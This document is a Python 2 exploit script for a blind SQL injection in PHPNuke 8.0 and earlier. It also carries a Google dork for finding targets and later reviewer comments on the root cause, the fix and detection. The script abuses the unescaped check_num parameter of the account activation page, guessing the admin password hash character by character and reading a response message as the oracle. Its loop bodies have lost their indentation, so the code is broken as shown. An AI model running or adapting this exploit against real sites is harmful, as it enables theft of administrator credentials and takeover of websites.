
PHPNuke <= 8.0 And maybe Higher Blind Sql Injection Vulnerab
#!/usr/bin/python
#=================================================================================================#
# This is a Priv8 Exploit. #
# Date: 23/02/2008 [dd,mm,yyyy] #
# #
#=================================================================================================#
# PHPNuke <= 8.0 And maybe Higher Blind Sql Injection Vulnerability #2 #
# Response Analysis Method #
# #
# Vendor: http://www.phpnuke.org #
# Severity: Highest #
# Author: The:Paradox #
#=================================================================================================#
# Server configuration requirements: #
# magic_quotes_gpc = 0 #
#=================================================================================================#
# Proud To Be Italian. #
#=================================================================================================#
"""
Related Codes:
mainfile.php; line 89;
if (!ini_get('register_globals')) {
@import_request_variables("GPC", "");
}
/Your_Account/index.php; line 1700;
switch($op) {
// [..]
case "activate":
activate($username, $check_num);
break;
// [..]
}
/Your_Account/index.php; line 161:
function activate($username, $check_num) {
global $db, $user_prefix, $module_name, $language, $prefix;
$username = filter($username, "nohtml", 1);
$past = time()-86400;
$db->sql_query("DELETE FROM ".$user_prefix."_users_temp WHERE time < $past");
$sql = "SELECT * FROM ".$user_prefix."_users_temp WHERE username='$username' AND check_num='$check_num'";
echo $sql;
$result = $db->sql_query($sql);
"""
#=================================================================================================#
# Proof Of Concept / Bug Explanation: #
# #
# I'm too lazy to write an explanation this time. Sql injection with Mq=OFF in the $check_num variable. #
# The null byte bypasses all the query string checks. #
# #
#=================================================================================================#
# Google Dork=> Powered by PHPNuke #
#=================================================================================================#
# Use this at your own risk. You are responsible for your own deeds. #
#=================================================================================================#
# Python Exploit Starts #
#=================================================================================================#
# Python 2 script: `print` is used as a statement and the HTTP client is the
# Python 2 `httplib` module.  NOTE(review): the bodies of the while/for loops
# further down (from "for i in md5tuple:" on) have lost their indentation in
# this paste, so the listing does not parse as shown.
#
# What the script does: it recovers a stored password hash one character at a
# time.  Each HTTP request tests a single (position, candidate character) pair
# through a condition injected into the activation query, and the presence of
# a fixed string in the response body is the boolean oracle that decides
# whether the candidate is kept (blind SQL injection, response-analysis style).
#
# Root cause, visible in the PHP excerpt in the header: activate() interpolates
# $check_num into the SQL string without escaping (filter() is applied to
# $username only), and the author lists magic_quotes_gpc = 0 as the only
# precondition.  The application-side fix is a parameterised query, or at
# least escaping of every value that reaches the query; magic_quotes_gpc is a
# server setting, not an application control, and it was removed from PHP in
# 5.4, so it must not be relied on.
#
# Detection: every probe is a GET to modules.php?name=Your_Account&op=activate
# whose check_num parameter carries %00, a single quote and SQL keywords (see
# the request built below) -- straightforward to match in access logs or a
# WAF rule.  At most 16 candidates x 32 positions = 512 such requests for one
# username from one client, spaced half a second apart.
import httplib, sys, time
# Banner and usage text; the runtime strings are left exactly as the author
# wrote them.
print "\n#=========================================================#"
print " PHPNuke <= 8.0 And Maybe Higher "
print " Blind Sql Injection Vulnerability Mq=0 "
print " Response Analisys Method "
print " "
print " Discovered By The:Paradox "
print " "
print " Usage: "
print " python %s [Target] [Path] [UsernameUnveryfied] " % (sys.argv[0])
print " "
print " Example: "
print " python %s 127.0.0.1 /Nuke/ Abdullah " % (sys.argv[0])
print " python %s www.host.com / Andrea " % (sys.argv[0])
print " "
print " "
print "#=========================================================#\n"
# Three positional arguments are required (host, path, username); with fewer
# the script exits silently after printing the usage banner above.
if len(sys.argv)<=3: sys.exit()
else: print "[.]Exploit Starting."
target = sys.argv[1]
path = sys.argv[2]
# Table prefix concatenated into the injected subquery (prefix + "authors");
# the example query in the comment below assumes the "nuke_" prefix.
prefix = "nuke_"
# Port is passed to HTTPConnection as a string, as written by the author.
port = "80"
# j is the 1-based character position currently being guessed; h4sh collects
# the characters accepted so far (it is written to stdout as it grows and is
# not printed again at the end).
j=1
h4sh = ""
# Candidate byte values: ASCII '0'-'9' (48-57) and 'a'-'f' (97-102), i.e. the
# hexadecimal alphabet of a 32-character hash; the trailing 'END' sentinel is
# reached only when no candidate matched for the current position.
md5tuple = []
for k in range(48,58): md5tuple.append(k) # 48->57 and 97->102
for k in range(97,103): md5tuple.append(k)
md5tuple.append('END')
# Result query >>>
#
# SELECT * FROM nuke_users_temp WHERE username='Nick' AND check_num='1%00' OR (SELECT IF((ASCII(SUBSTRING(pwd,1,1))=99),1,null) FROM nuke_authors WHERE radminsuper=1)='1'
#
# The injected OR (SELECT IF(...)) term makes the WHERE clause depend on
# whether the guessed character at position j of pwd is correct; the script
# observes that difference through the response body rather than the data.
print "[.]Blind Sql Injection Starts.\n\nHash:"
# Outer loop: one hash position per iteration, 32 positions in total.
while j <= 32:
# Inner loop: try each candidate for the current position.
for i in md5tuple:
# No candidate matched this position: give up.
if i == 'END': sys.exit('[-]Exploit Failed.\n')
conn = httplib.HTTPConnection(target,port)
# One request per (j, i) pair; the condition rides in check_num, which the
# vulnerable activate() concatenates into its SQL unescaped.
conn.request('GET', path + "modules.php?name=Your_Account&op=activate&username=" + sys.argv[3] + "&check_num=1%00'+OR+(SELECT+IF((ASCII(SUBSTRING(pwd," + str(j) + ",1))=" + str(i) + "),1,null)+FROM+" + prefix + "authors+WHERE+radminsuper=1)='1", {}, {"Accept": "text/plain", "lang":"english"})
response = conn.getresponse()
# Fixed pause between probes.
time.sleep(0.5)
# A 404 means the supplied path does not reach modules.php; stop.
if response.status == 404: sys.exit('[-]Error 404. Not Found.')
# Boolean oracle: the presence of this fixed message in the body is what the
# script treats as "candidate i is the character at position j".
if response.read().find("New user verification number is invalid.") != -1:
sys.stdout.write(chr(i))
sys.stdout.flush()
h4sh += chr(i)
# Advance to the next position and restart the candidate loop.
j += 1
break;
print "\n\n[+]All Done.\n-=Paradoxe=-"